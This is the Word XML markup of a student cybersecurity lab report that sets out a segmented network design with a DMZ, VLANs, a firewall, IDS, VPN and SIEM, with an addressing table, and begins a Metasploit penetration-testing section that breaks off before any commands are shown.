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00" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 04 Report: Secure Network Design, Penetration Testing &amp; Encrypted Traffic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared by: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Arman Kumar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">March 12, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux 2024.1 (192.168.1.50)  |  Target: Metasploitable 2 (192.168.1.100)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework 6.3  |  Wireshark 4.2.3  |  draw.io  |  Python 3.12 (pyshark, scapy, matplotlib)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 04 covers the full offensive and defensive security lifecycle: designing a secure network from the ground up, simulating a real-world penetration test using Metasploit, and analysing encrypted HTTPS traffic patterns using Python. Each section builds on skills developed in Tasks 01–03, moving from passive analysis toward active exploitation and architectural security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The lab uses the same isolated VMware network (192.168.1.0/24) with Metasploitable 2 as the target, ensuring all tests are contained and safe. All penetration testing was performed in a closed lab environment with explicit permission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Secure Network Topology Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 Design Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The topology is designed for a small organisation of 15 devices across three functional areas: public-facing services, internal employees, and guest access. The core design principles applied are:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Defence in Depth: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple security layers ensure no single failure compromises the entire network. Traffic must pass through firewall inspection before reaching any internal zone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Segmentation via VLANs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Employee (VLAN 10), Guest (VLAN 20), Servers (VLAN 30), and DMZ (VLAN 40) are logically separated. Intra-VLAN traffic requires explicit firewall rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DMZ for Public Services: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The web server, mail server, and DNS proxy are placed in a dedicated DMZ (192.168.10.0/24). External traffic can only reach DMZ hosts, never the internal LAN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Principle of Least Privilege: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Guest devices have no LAN access — only internet egress via a captive portal. Finance and HR workstations are restricted to approved destinations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Network Topology Diagram</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="3648075"/>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648075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1: Secure Network Topology — DMZ, VLAN Segmentation, Firewall, IDS/IPS, VPN Gateway &amp; SIEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Subnet Addressing Plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rP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200"/>
        <w:gridCol w:w="2200"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="2C3E5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Zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="2C3E5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Subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="2C3E5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Devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="2C3E5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Access Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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DMZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.10.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Web, Mail, DNS (3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Internet → DMZ; LAN → DMZ only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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VLAN 10 — Employee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.20.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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HR, Eng, Finance (10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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LAN ↔ Servers; No DMZ write</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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VLAN 20 — Guest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.30.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Guest devices (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Internet egress only (TCP 80/443)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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Internal Servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.40.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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File, AD, IDS/IPS (3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Employee VLAN only; No internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.1.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Firewall, VPN GW, SIEM (3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Admin access only; MFA enforced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1: Network zone addressing and access policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 Security Design Choices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Edge Firewall (Stateful + NAT): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Drops all unsolicited inbound connections. Uses stateful inspection to track connection state, blocking spoofed packets mid-stream. NAT hides internal IPs from the internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IDS/IPS (Snort on mirror port): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Snort sensor monitors all inter-VLAN traffic via a switch mirror port without being in-path, ensuring IDS failure does not cause network outage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">VPN Gateway (WireGuard): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote workers connect via WireGuard VPN with mandatory MFA. All VPN traffic is decrypted and inspected by the internal firewall before routing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM / ELK Stack: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Centralised log aggregation from firewall, IDS, Active Directory, and servers. Provides real-time alerting and audit trails for incident response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Penetration Testing with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Installation &amp; Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework was installed from </w:t>
      </w:r>
      <w:hyperlink w:history="1" r:id="rIdq-xay18ghztaxycfgftxn">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.metasploit.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
